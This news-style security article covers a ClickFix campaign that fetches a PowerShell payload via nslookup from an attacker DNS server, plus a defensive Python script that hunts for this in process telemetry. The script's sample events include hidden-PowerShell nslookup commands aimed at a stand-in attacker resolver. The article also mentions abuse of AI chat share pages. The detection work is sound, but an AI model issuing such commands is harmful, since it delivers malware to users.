Threat actors have developed a ClickFix campaign that uses DNS lookups to deliver its payload, the first known use of this technique in this class of social-engineering attack. Victims are instructed to run an nslookup command against an attacker-controlled DNS server instead of the system's configured resolver, and the server returns a PowerShell script embedded in the DNS response. The script is then executed on the victim's machine and ultimately installs the ModeloRAT remote access trojan.
The attack chain begins when users are tricked into opening the Windows Run dialog and executing a specially crafted nslookup command. The response from the malicious DNS server contains a "NAME:" field holding the second-stage PowerShell payload, which in turn downloads additional components, including a ZIP archive containing Python executables. Persistence is established through VBScript files dropped in the AppData directory and shortcuts placed in the Startup folder.
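The chain above leaves a distinctive footprint in process-creation telemetry: nslookup launched from an interactive parent (the Run dialog runs commands under explorer.exe) with an explicit resolver argument that is not one of the organisation's own DNS servers. The following is an added example, not code from the Microsoft report or from the article, showing a small hunt over constructed Sysmon-style events. The trusted-resolver allowlist, the event field names and the sample events (including the documentation-range address 203.0.113.10 standing in for an attacker resolver) are all assumptions for illustration.

```python
"""Hunt process-creation telemetry for ClickFix-style nslookup abuse.

Heuristics, each tied to one observation from the attack chain above:
  * nslookup pointed at an explicit resolver that is not one of ours
  * nslookup spawned from explorer.exe, i.e. typed into the Run dialog
  * a script host whose own command line runs nslookup (output fed to a script)
"""
import re

# ASSUMPTION: resolvers endpoints are expected to use; replace with your own.
TRUSTED_RESOLVERS = {"10.0.0.53", "10.0.0.54"}

# Parents that mean "a user typed this" rather than "a tool ran this".
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# First nslookup invocation and its arguments, stopping at shell metacharacters.
NSLOOKUP_RE = re.compile(r'''nslookup(?:\.exe)?\s+([^|&;"']*)''', re.IGNORECASE)


def parse_nslookup(cmdline):
    """Return (query, server) for the first nslookup in cmdline, or None.

    Windows nslookup takes positional arguments [name-to-find] [server];
    tokens beginning with '-' are options such as -type=txt and are skipped.
    """
    m = NSLOOKUP_RE.search(cmdline)
    if not m:
        return None
    positional = [t for t in m.group(1).split() if not t.startswith("-")]
    query = positional[0] if positional else None
    server = positional[1] if len(positional) > 1 else None
    return query, server


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event):
    """Return the reasons this event looks like ClickFix nslookup abuse.

    An empty list means nothing matched (e.g. routine admin troubleshooting).
    """
    reasons = []
    parsed = parse_nslookup(event["cmdline"])
    if parsed is None:
        return reasons
    query, server = parsed
    image = basename(event["image"])
    parent = basename(event["parent"])

    if server is not None and server.lower() not in TRUSTED_RESOLVERS:
        reasons.append(f"nslookup directed at non-corporate resolver {server} (query {query})")
    if parent in INTERACTIVE_PARENTS:
        reasons.append(f"launched from {parent}, consistent with the Run dialog")
    if image in SCRIPT_HOSTS:
        reasons.append(f"{image} command line embeds nslookup, output likely fed to a script")
    return reasons


def hunt(events):
    """Map event id -> reasons for every event that matched at least one heuristic."""
    hits = {}
    for event in events:
        reasons = assess(event)
        if reasons:
            hits[event["id"]] = reasons
    return hits


# Constructed sample events in a Sysmon-like shape; not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\nslookup.exe",
     "cmdline": "nslookup -type=txt verify.example 203.0.113.10"},
    {"id": 2, "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\nslookup.exe",
     "cmdline": "nslookup mail.corp.example"},
    {"id": 3, "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\nslookup.exe",
     "cmdline": "nslookup mail.corp.example 10.0.0.53"},
    {"id": 4, "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "nslookup -q=txt check.example 203.0.113.10"'},
    {"id": 5, "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for event_id, reasons in hunt(SAMPLE_EVENTS).items():
        print(f"event {event_id}:")
        for reason in reasons:
            print(f"  - {reason}")
```

On the constructed sample, events 1 and 4 are flagged (untrusted resolver plus an interactive parent, and for event 4 a script host wrapping nslookup), while events 2 and 3, an administrator's lookups with no server or with a corporate resolver, produce no hits. Tune TRUSTED_RESOLVERS to include any public resolvers your staff legitimately query, otherwise the first heuristic will fire on ordinary troubleshooting against 8.8.8.8 or 1.1.1.1.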
This approach is a significant departure from traditional ClickFix methods, which typically retrieve payloads over HTTP: DNS-based delivery lets attackers change the payload dynamically on the server side while the lookups blend in with normal network traffic. Microsoft researchers, who observed the campaign, have not identified the lure used to reach victims, but the delivery technique itself shows how far ClickFix evasion has progressed. For defenders, the practical point is that a user-launched nslookup aimed at an explicit, non-corporate resolver is an unusual event worth alerting on.
ClickFix attacks have diversified rapidly over the past year, expanding beyond basic PowerShell execution to browser-based JavaScript campaigns and OAuth application abuse. Recent variants have abused shared-conversation pages on ChatGPT and Claude to promote fraudulent guides, while another campaign used Pastebin comments to trick cryptocurrency users into executing malicious code directly in their browsers while visiting exchanges. These developments show how readily threat actors adapt social-engineering techniques across operating systems and applications.
